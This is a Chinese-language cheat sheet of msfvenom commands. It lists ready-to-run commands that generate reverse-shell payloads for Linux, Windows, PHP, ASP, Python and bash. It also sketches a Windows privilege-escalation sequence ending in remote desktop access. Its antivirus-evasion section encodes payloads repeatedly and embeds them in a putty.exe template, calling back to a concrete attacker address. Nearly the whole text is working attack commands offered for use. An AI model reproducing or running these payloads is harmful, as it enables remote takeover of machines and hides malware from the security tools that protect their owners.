Msfvenom是有效负载生成和编码的组合。
生成攻击载荷
Linux下反弹Meterpreter shell
1
|
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a x86 --platform linux -o shell
|
C反弹shell
1
|
msfvenom -p windows/shell_reverse_tcp LHOST=<your IP Address> LPORT=<your port to connect on> -b "x00x0ax0d" -a x86 --platform win -f c
|
Python反弹shell
1
|
msfvenom -p cmd/unix/reverse_python LHOST=<your IP Address> LPORT=<your port to connect on> -o shell.py
|
Asp反弹shell
1
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
|
Bash反弹shell
1
|
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
|
PHP反弹shell
1
|
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw -o shell.php
|
Windows反弹shell
1
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
|
64位系统要加x64
1
|
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
|
Windows提权
第一步生成Windows攻击载荷
1
|
msfvenom -p windows/meterpreter/reverse_tcp lhost=本机IP -f exe >/home/shell.exe
|
第二步MSF监听
1
|
use exploit/multi/handler //设置模块
|
第三步提权
1
|
shell //进入终端
|
第四步开启远程连接
1
|
开启远程桌面
|
免杀
多次编码免杀
1
|
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -f exe -o /var/www/html/reverse_http_encode.exe
|
自定义二进制代码的文件模板免杀
1
|
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -x ~/putty.exe
|